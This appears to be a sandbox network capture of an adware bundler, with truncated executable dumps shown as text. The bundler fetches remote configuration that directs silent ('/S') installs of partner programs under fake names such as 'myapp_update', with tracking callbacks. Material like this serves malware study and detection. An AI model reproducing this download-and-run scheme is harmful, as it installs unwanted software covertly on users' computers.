Date: Wed, 13 Aug 2014 18:28:20 GMT<br>
Content-Type: application/octet-stream<br>
Content-Length: 5553368<br>
Connection: close<br>
x-amz-id-2: sZ2udSlHAUDGwtkdUvd9pozvdCHghOMRNSM7byPcsOYUW03S2jWxJx3w4LZWwpOJg08xk/IjqCI=<br>
x-amz-request-id: 2826327299B362F7<br>
Last-Modified: Mon, 04 Aug 2014 11:30:27 GMT<br>
ETag: "23128747b91b2f635a46b252f84c2ee1"<br>
Server: NetDNA-cache/2.2<br>
X-Cache: HIT<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i<br>u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................<br>......PE..L......K.................\..........<2.......p....@......<br>....................P.......RU......................................s.<br>.........(m..........x.T.`............................................<br>................p...............................text...ZZ.......\.....<br>............. ..`.rdata.......p.......`..............@[email protected]........<br>[email protected][email protected]<br>rc...(m.......n...v..............@..@.................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>...............................................U....\.}..t .}.F.E.u..H<br>.....>[email protected].>[email protected].<br>P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N<br>U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u<br>[email protected]}[email protected].}.j.W.E......E.......P<br>[email protected]@[email protected] [email protected]..<br>.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....<br>.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..</pre><<< skipped >>></font><br><br
<font color="red">GET /canal/rotateur/getCaping.php?p=systemspeedup HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:37 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 28<br>
Content-Type: text/html<br><pre>..................T._.......</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=systemspeedup HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:40 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Length: 13<br>
Content-Type: text/html<br><pre>.....true</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=systemspeedup HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:40 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Length: 13<br>
Content-Type: text/html<br><pre>.....true..</pre></font><br><br
<font color="red">GET /setup/ressources/partenaires_financiers/MYPCBACKUP/mypcbackup.exe HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: softs.illyx.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:17 GMT<br>
Server: Apache<br>
Last-Modified: Thu, 03 Jul 2014 14:46:53 GMT<br>
ETag: "1009e1-2a480-4fd4b145f3140"<br>
Accept-Ranges: bytes<br>
Content-Length: 173184<br>
Content-Type: application/x-msdos-program<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i<br>u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................<br>......PE..L......K.................^...........0.......p....@.........<br>.................................................................t....<br>......0m..............h...............................................<br>.............p...............................text...L\.......^........<br>.......... ..`.rdata.......p.......b..............@[email protected]\......<br>.....v..............@....ndata...................................rsrc.<br>..0m.......n...z..............@..@....................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>............................................U....\.}..t .}.F.E.u..H...<br>[email protected]@..e...E..E.P.u...Pr@<br>..}[email protected]... M.......M....3.....FQ.....NU..M.....<br>.....VT..U.....FP..E...............E.P.M...Hp@[email protected]<br>....E..9}[email protected].}[email protected]..<br>[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.<br>[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...<br>..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....</pre><<< skipped >>></font><br><br><font color="red">GET /setup/ressources/partenaires_financiers/KREAPIXEL/combo_ssup_winu/app.exe HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: softs.illyx.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:31 GMT<br>
Server: Apache<br>
Last-Modified: Wed, 06 Aug 2014 13:03:16 GMT<br>
ETag: "160314-6a800-4fff5986a0d00"<br>
Accept-Ranges: bytes<br>
Content-Length: 436224<br>
Content-Type: application/x-msdos-program<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......S...........<br>.....g..........$...............%.....H.......X.2...........q)..Z...q)<br>......q)........\.....q)......Rich............................PE..L...<br>v'.S.........."......P...`....................@.......................<br>...@............@...@[email protected]:..$.......lZ......<br>.............>..........................................H..........<br>.................................UPX0.................................<br>[email protected]....`.......`...H.....<br>.........@............................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..........3.91.UPX!.........p.:.....?......&..e....U......}..SVW....`.<br>.....E.t..u....}........H...t. ......v.L..4.....G..I.........&.k..]..@<br>..E......V......~.....t..........}.;._..>r..E._^[.........=.......M<br>.....Po..>..i....j0X.E....F!..A...x.V]*.a.....op6......a;j.{..on...<br>..Y..t1&.H..Nt...|.x..0.V.8.G&F..w..|.|..8.f.3....QS......V.>W.M...<br>..C..!....S.:.5.....t..]...3......W.~9.:.x...}u(.~.._...t..7uPW_...kzY<br>.^..FZ[................T.....~...v.k...F.....4......4,.n_..F....8B..6)<br>xh....9YV..,..../....Zu.z..lx....jY8.jX...ox......U......a......p.</pre><<< skipped >>></font><br><br
<font color="red">GET /download/d/d/9/dd9a82d0-52ef-40db-8dab-795376989c03/vcredist_x86.exe HTTP/1.0<br>
Host: download.microsoft.com<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.0 200 OK<br>
Content-Type: application/octet-stream<br>
Last-Modified: Fri, 08 Aug 2008 21:12:57 GMT<br>
Accept-Ranges: bytes<br>
ETag: "cde1e9879bf9c81:0"<br>
Server: Microsoft-IIS/8.0<br>
Content-Disposition: attachment<br>
Content-Length: 4216840<br>
Date: Wed, 13 Aug 2014 18:28:24 GMT<br>
Connection: close<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$...........K...K...<br>K.......D...K... ......._.......J.......J...RichK...........PE..L...{.<br>.B.................z..........rY... ........... ......................<br>.........6A.......... [email protected].........<br>...4@..$...........!............................................... ..<br>.............................text....x... ...z.................. ..`.d<br>[email protected].........?.............<br>....@..@..............................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>....................................................t...Z.............<br>......&...<...L............................................... ...:<br>...J...V...^...x.......................................&...<...J...<br>^...t.......................................(...:...R...b...p.........<br>..........................&...N...b...|...............r.......\...L...<br>:...,...........................................~...f.................<br>......z...............................&...0...D...:...............:...<br>........$...................{..B.............&..................Z.</pre><<< skipped >>></font><br><br<font color="red">GET /sha2-assured-cs-g1.crl HTTP/1.1<br>
Accept: */*<br>
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br>
Host: crl3.digicert.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
Pragma: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Accept-Ranges: bytes<br>
Cache-Control: max-age=604800<br>
Content-Type: application/x-pkcs7-crl<br>
Date: Wed, 13 Aug 2014 18:28:36 GMT<br>
Etag: "922944398"<br>
Expires: Wed, 20 Aug 2014 18:28:36 GMT<br>
Last-Modified: Wed, 13 Aug 2014 17:15:03 GMT<br>
Server: ECS (lga/1379)<br>
X-Cache: HIT<br>
Content-Length: 1692<br><pre>0...0......0...*.H........0r1.0...U....US1.0...U....DigiCert Inc1.0...<br>U....VVV.digicert.com110/..U...(DigiCert SHA2 Assured ID Code Signing <br>CA..140813164522Z..140820170000Z0...0!...F..D.....A4...q..131031134730<br>Z0!.....C5...v.........131104065045Z0!.......f[:t.....P...131111081914<br>Z0!....<.....i5i....[..131111081914Z0!......'...2...b.[...131111081<br>914Z0!...........3a.......131230172332Z0!......v7.*.....G....140110211<br>632Z0!....>$,.^v.2..X.4...140123133200Z0!.....3.....Q.>2.ae..140<br>128165227Z0!....L.....b..D...M..140128214342Z0!....?....}D.........140<br>203225616Z0!......-/...3.U...M..140203225616Z0!.....JR....zU.|q.h..140<br>203225616Z0!........*..~..N.XW..140203225616Z0!...;).?.5..c#FM."Z..140<br>203225616Z0!...Z............E...140207094008Z0!...1Q...b..o.g..(...140<br>207094008Z0!.....i..hs....n.~ ..140207094008Z0!.........cif*...m...140<br>207094008Z0!.....L.T_......N.o..140327181117Z0!....i..]..$.`.9.1...140<br>424213723Z0!.....E=.n.....k.....140506083000Z0!....;~:P.,.p....c...140<br>513001311Z0!...4.Lc....}jB*.A...140514153453Z0!....0p..E.=..g".,Q..140<br>516193605Z0!.........X|Pu...A2..140625110835Z0!...C.=.......$..^...140<br>703094904Z0!...@i.........'.p1..140715201841Z0!...{..'b.Y..........140<br>721123757Z0!......f....\.G.*....140721123900Z0!.....n.<F.B..Y7.....<br>[email protected]:......140811075719Z0!...T..U.Aw....w9.B..<br>140811075719Z0!............].......140811075719Z.00.0...U.#..0...Z..{*<br>....q..`.-.eu.X0...U.......%0...*.H................W...r....F...4%.t.y<br>..n..5......3o*9a6...$.!'I4......!.f.J.8........l...&....E3....1;7</pre><<< skipped >>></font><br><br<font color="red">GET /stats/winUSet.php?deploy_systemTask_prepare=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:27:57 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/winUSet.php?deploy_systemTask_success=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:27:59 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/winUSet.php?install_systemTask_fail=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:03 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/winUSet.php?deploy_adminTask_prepare=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:06 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br><font color="red">GET /stats/winUSet.php?deploy_adminTask_success=true HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:08 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 25<br>
Content-Type: text/html<br><pre>[email protected]....</font>....</pre></font><br><br
<font color="red">GET /setup/ressources/partenaires_financiers/MYPCBACKUP/mypcbackup.exe HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: softs.illyx.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:16 GMT<br>
Server: Apache<br>
Last-Modified: Thu, 03 Jul 2014 14:46:53 GMT<br>
ETag: "1009e1-2a480-4fd4b145f3140"<br>
Accept-Ranges: bytes<br>
Content-Length: 173184<br>
Content-Type: application/x-msdos-program<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i<br>u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................<br>......PE..L......K.................^...........0.......p....@.........<br>.................................................................t....<br>......0m..............h...............................................<br>.............p...............................text...L\.......^........<br>.......... ..`.rdata.......p.......b..............@[email protected]\......<br>.....v..............@....ndata...................................rsrc.<br>..0m.......n...z..............@..@....................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>............................................U....\.}..t .}.F.E.u..H...<br>[email protected]@..e...E..E.P.u...Pr@<br>..}[email protected]... M.......M....3.....FQ.....NU..M.....<br>.....VT..U.....FP..E...............E.P.M...Hp@[email protected]<br>....E..9}[email protected].}[email protected]..<br>[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.<br>[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...<br>..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....</pre><<< skipped >>></font><br><br
<font color="red">GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1<br>
Accept: */*<br>
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br>
Host: VVV.download.windowsupdate.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
Pragma: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: text/plain<br>
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT<br>
Accept-Ranges: bytes<br>
ETag: "806f4cbb43dcf1:0"<br>
Server: Microsoft-IIS/7.5<br>
X-Powered-By: ASP.NET<br>
Content-Length: 18<br>
Cache-Control: max-age=10373<br>
Date: Wed, 13 Aug 2014 18:28:35 GMT<br>
Connection: keep-alive<br>
X-CCC: US<br>
X-CID: 2<br><pre>1401CF3DB40B609892</font>....</pre></font><br><br><font color="red">GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1<br>
Accept: */*<br>
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br>
Host: VVV.download.windowsupdate.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
Pragma: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: application/octet-stream<br>
Last-Modified: Wed, 12 Mar 2014 20:20:10 GMT<br>
Accept-Ranges: bytes<br>
ETag: "0b96c77303ecf1:0"<br>
Server: Microsoft-IIS/7.5<br>
X-Powered-By: ASP.NET<br>
Content-Length: 54007<br>
Date: Wed, 13 Aug 2014 18:28:35 GMT<br>
Connection: keep-alive<br>
X-CCC: US<br>
X-CID: 2<br><pre>MSCF............,...................I.................lDxa .authroot.s<br>tl......8..CK...<T...g.v!M.d..f.%d..}K..5..F..d'K......%K..%...!..=<br>.k..........{=/....{g.~..........<.....h..b...8..Ep.x.....G. .....p<br>q..``a.i|"n|8...!..gv...: I........!...%$....;PBHA.....!A....L...'...:<br>..0...I....fD"N#...._..?....E..m..1\.$...{P....:......../...\YB.m:....<br>.dE.....)...V....$....Dn:....0E..S."...o..q.....K...I..K...(x%....><br>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.<br>@....x"....T..H...<.CQ..H.M.K.".H....`.....!.G....AF\.{...V..LCy.i <br>y..Q.'..M...bE.%..<...nG.3..\K.t..ah...5Z~.h...8..@.).... ....X...v<br>..,.-.M..u.......Z"..U...0:O%..}.(t............=R.......[b...z.....8..<br>)........M|..g..L.a...>....[.E&..{..|..t...[t..B......./[..&.L`.w..<br>..[L..ZW.... ."....<...I.G\.H[:...B.B.qT... ..(....: U....(.J.....?<br>._..'..Hp..o.B......!......bj.G.u^.%\r..b...*7.[nO..S...b.l@jn. .Hb...<br>M.....9.....8.='...)\.....M.#.M......L.Jh.../..G.!\.Y....&.....P^...,.<br>.U..3...W...._...0..?*...KZ....fM...8.6U..aG.a.......~....?.N. .3.....<br>,>.rH..*O..E..T0.......?i...k.T.'>".....E....%SK.v..8...t.:...].<br>E.K2....u..../i.t.9....2N..QI ..h..t..Ad....0.........*...R......|....<br>..7A:bP. n:.......Fk.[q....]D.......3.0.)...G]..?4.o...p......?...3...<br>[email protected]#.n\.-....p.T..G............4.......:H....2..9.|.`~0GL.=....u.y.<br>..L0iL.....A....^[email protected]#.T...{.......P.....[..j....<br>.i.%[email protected].@......]%..g.1..3Z6^<<br>;!.Q...m......9....l..x.....$7..[.....L........L....F*....D.U.'...</pre><<< skipped >>></font><br><br><font color="red">GET /msdownload/update/v3/static/trustedr/en/0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43.crt HTTP/1.1<br>Accept: */*<br>
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br>
Host: VVV.download.windowsupdate.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
Pragma: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: application/x-x509-ca-cert<br>
Last-Modified: Tue, 02 Jan 2007 18:53:09 GMT<br>
Accept-Ranges: bytes<br>
ETag: "ae78f13e9f2ec71:0"<br>
Server: Microsoft-IIS/7.5<br>
X-Powered-By: ASP.NET<br>
Content-Length: 955<br>
Date: Wed, 13 Aug 2014 18:28:35 GMT<br>
Connection: keep-alive<br>
X-CCC: US<br>
X-CID: 2<br><pre>0...0................F...`...090...*.H........0e1.0...U....US1.0...U..<br>..DigiCert Inc1.0...U....VVV.digicert.com1$0"..U....DigiCert Assured I<br>D Root CA0...061110000000Z..311110000000Z0e1.0...U....US1.0...U....Dig<br>iCert Inc1.0...U....VVV.digicert.com1$0"..U....DigiCert Assured ID Roo<br>t CA0.."0...*.H.............0.............C.\....`.q....&...... 9(X`..<br>.....2a<..(.........z.....yS\1.*...26v...<...j.!.Ra.. .......d..<br>[_.X.5.G..6.k...8>....3../..(......nD.a5...Y..vm...K. ..r..`...5.xU<br>. ...m..I|1.3l"...2Z......9...:r.......1u..}".?.F..(y....W..~......V..<br>.........?........_.wO......c0a0...U...........0...U.......0....0...U.<br>.....E.......1-Q...!..m..0...U.#..0...E.......1-Q...!..m..0...*.H.....<br>................rszd...rf.2.Bub.......V.....(...`\.LX..=.IEX.5i..G.V.y<br>...g.....<...&, .=.(.._.".....e.....gI.]...*.&.x.}? ..&5m_...I[....<br>.=%......o...dh..-..B.....b..Pg.l....k.6...7|.[mz..F`..'..K....g*h....<br>.3f....n...c.....%ml...a....&..q.......Q. .....P....E/.....</pre></font><br><br
<font color="red">GET /setup/ressources/partenaires_financiers/SYSTEMSPEEDUP/ssupsetup_binstall3.exe HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: softs.illyx.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:42 GMT<br>
Server: Apache<br>
Last-Modified: Wed, 23 Jul 2014 16:58:10 GMT<br>
ETag: "3c0d76-3f8070-4fedf3eb42c80"<br>
Accept-Ranges: bytes<br>
Content-Length: 4161648<br>
Content-Type: application/x-msdos-program<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i<br>u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f<br>.R.................^...|.......0.......p....@.........................<br>.................................................t....................<br>...................................................................p..<br>.............................text....].......^.................. ..`.r<br>data.......p.......b..............@[email protected]..........<br>....@....ndata...................................rsrc................z<br>..............@..@....................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>............................................U....\.}..t .}.F.E.u..H...<br>[email protected]@..e...E..E.P.u....r@<br>..}[email protected]... M.......M....3.....FQ.....NU..M.....<br>.....VT..U.....FP..E...............E.P.M...Tp@[email protected]<br>....E..9}[email protected].}.j.W.E......E.......@[email protected]..<br>[email protected]<[email protected] [email protected]...\r@._<br>^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G<br>.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i.</pre><<< skipped >>></font><br><br
<font color="red">GET /canal/conf HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:12 GMT<br>
Server: Apache<br>
Last-Modified: Mon, 30 Jun 2014 10:29:15 GMT<br>
ETag: "3e0787-6c-4fd0b217ab4c0"<br>
Accept-Ranges: bytes<br>
Content-Length: 108<br>
Content-Type: text/plain<br><pre>[main]..dir=hXXp://winu.secureddl.com/canal/main/..[rotateur]..dir=htt<br>p://winu.secureddl.com/canal/rotateur/</font>....</pre></font><br><br><font color="red">GET /canal/conf HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:12 GMT<br>
Server: Apache<br>
Last-Modified: Mon, 30 Jun 2014 10:29:15 GMT<br>
ETag: "3e0787-6c-4fd0b217ab4c0"<br>
Accept-Ranges: bytes<br>
Content-Length: 108<br>
Content-Type: text/plain<br><pre>[main]..dir=hXXp://winu.secureddl.com/canal/main/..[rotateur]..dir=htt<br>p://winu.secureddl.com/canal/rotateur/</font>....</pre></font><br><br><font color="red">GET /canal/main/conf HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:13 GMT<br>
Server: Apache<br>
Last-Modified: Fri, 01 Aug 2014 14:54:55 GMT<br>
ETag: "400708-d3-4ff92927fcdc0"<br>
Accept-Ranges: bytes<br>
Content-Length: 211<br>
Content-Type: text/plain<br><pre>[version]..current=22..old=0|2|21..[launcher]..url=hXXp://winu.secured<br>dl.com/canal/main/launcher.exe..args="-id=9999"..[tracking]..url=http:<br>//winu.secureddl.com/stats/adminTaskSet.php?download_launcher_fail=tru<br>e</font>....</pre></font><br><br><font color="red">GET /canal/main/conf HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:13 GMT<br>
Server: Apache<br>
Last-Modified: Fri, 01 Aug 2014 14:54:55 GMT<br>
ETag: "400708-d3-4ff92927fcdc0"<br>
Accept-Ranges: bytes<br>
Content-Length: 211<br>
Content-Type: text/plain<br><pre>[version]..current=22..old=0|2|21..[launcher]..url=hXXp://winu.secured<br>dl.com/canal/main/launcher.exe..args="-id=9999"..[tracking]..url=http:<br>//winu.secureddl.com/stats/adminTaskSet.php?download_launcher_fail=tru<br>e</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/conf HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:13 GMT<br>
Server: Apache<br>
Last-Modified: Fri, 27 Jun 2014 12:43:43 GMT<br>
ETag: "4005fc-48-4fcd0a8d87dc0"<br>
Accept-Ranges: bytes<br>
Content-Length: 72<br>
Content-Type: text/plain<br><pre>[version]..current=1..old=0..[action]..run_now=1..run_delayed=0..delay<br>=0</font>....</pre></font><br><br><font color="red">GET /canal/rotateur/winUoffer.params HTTP/1.1<br>
User-Agent: AutoIt<br>
Host: winu.secureddl.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:13 GMT<br>
Server: Apache<br>
Last-Modified: Thu, 07 Aug 2014 09:55:56 GMT<br>
ETag: "40071a-1f5d-50007184ca300"<br>
Accept-Ranges: bytes<br>
Content-Length: 8029<br>
Content-Type: text/plain<br><pre>[mypcbackup]..displayname=myapp_update..active=1..delay=0..isAdmin=0..<br>url=hXXp://softs.illyx.com/setup/ressources/partenaires_financiers/MYP<br>CBACKUP/mypcbackup.exe..args="/S"..regkeys="HKEY_LOCAL_MACHINE\SOFTWAR<br>E\Microsoft\Windows\CurrentVersion\App Paths\MyPC Backup"..lang=All..t<br>racker_download_success=hXXp://winu.secureddl.com/stats/partenaires/my<br>pcbackupSet.php?download_success=true..tracker_download_fail=hXXp://wi<br>nu.secureddl.com/stats/partenaires/mypcbackupSet.php?download_fail=tru<br>e..tracker_install_success=hXXp://winu.secureddl.com/stats/partenaires<br>/mypcbackupSet.php?install_success=true..tracker_install_fail=hXXp://w<br>inu.secureddl.com/stats/partenaires/mypcbackupSet.php?install_success=<br>true..tracker_alreadyinstalled=hXXp://winu.secureddl.com/stats/partena<br>ires/mypcbackupSet.php?alreadyinstalled=true..caping=hXXp://winu.secur<br>eddl.com/canal/rotateur/getCaping.php?p=mypcbackup..version=1..[combo_<br>ssup]..displayname=app_update..active=1..delay=0..isAdmin=0..url=http:<br>//softs.illyx.com/setup/ressources/partenaires_financiers/KREAPIXEL/co<br>mbo_ssup_winu/app.exe..args=..regkeys=""..lang=FR..tracker_download_su<br>ccess=..tracker_download_fail=..tracker_install_success=..tracker_inst<br>all_fail=..tracker_alreadyinstalled=..caping=hXXp://winu.secureddl.com<br>/canal/rotateur/getCaping.php?p=combo1..version=2..[combo_ssup_vuupc].<br>.displayname=win-app_update..active=1..delay=0..isAdmin=0..url=hXXp://<br>softs.illyx.com/setup/ressources/partenaires_financiers/KREAPIXEL/comb<br>o_ssup_winu/app.exe..args=..regkeys=""..lang=All..tracker_download</pre><<< skipped >>></font><br><br><font color="red">GET /canal/rotateur/getCaping.php?p=mypcbackup HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: winu.secureddl.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:13 GMT<br>
Server: Apache<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 28<br>
Content-Type: text/html<br><pre>..................T._.......</font>....</pre></font><br><br
<font color="red">GET /aadebc4830c51c2794a960fe5a9e11df.php HTTP/1.0<br>
Host: track.mypcbackup.com<br>
User-Agent: NSISDL/1.2 (Mozilla)<br>
Accept: */*<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Wed, 13 Aug 2014 18:28:23 GMT<br>
Server: Apache<br>
Set-Cookie: SESSID=c62772og8baf4j8liil7at9d03; path=/; domain=.mypcbackup.com<br>
Expires: Thu, 19 Nov 1981 08:52:00 GMT<br>
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>
Pragma: no-cache<br>
Set-Cookie: LC_CURRENCY=CA; expires=Sat, 23-Aug-2014 18:28:23 GMT; path=/; domain=.mypcbackup.com<br>
Set-Cookie: ?uva6aT*=CA; expires=Sat, 23-Aug-2014 18:28:23 GMT; path=/; domain=.mypcbackup.com<br>
